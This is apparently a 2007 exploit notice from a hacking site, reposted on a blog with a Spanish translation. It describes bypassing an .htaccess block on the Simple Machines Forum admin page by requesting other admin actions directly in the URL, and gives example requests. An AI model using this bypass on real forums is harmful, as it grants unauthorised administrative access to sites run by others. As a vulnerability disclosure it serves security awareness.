Discovered by Seph1roth on June 2007 (was priv8)
#
# Vulnerable: Simple Machine Forum [ALL Versions]
#
# Visit: http://www.blackroots.it - Best hacking site.
#
# Description:
If smf has index.php?action=admin in .htaccess ,i can bypass that by typing in the url some variable of administration panel :
example:
index.php?action=admin (.htaccess,then access denied)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)
...and others...
i can bypass and enter the administration by typing the accessible variables in the url...
# Greets to all BlackRoots Users
#
# Shoutz to all kiddies
#
# ./end
-------------------
Traduccion rapidita:
Vulnerable: Simple Machine Forum [Todas las Versiones]
# Description:
si el smf tiene .htaccess en index.php?action=admin, se puede bypasear escribiendo en la url una variable dentro del panel de administracion.
Ejemplo:
index.php?action=admin (.htaccess, DENEGADO)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)
Bytes
SMF .htaccess ByPass
Suscribirse a:
Enviar comentarios (Atom)
0 comentarios:
Publicar un comentario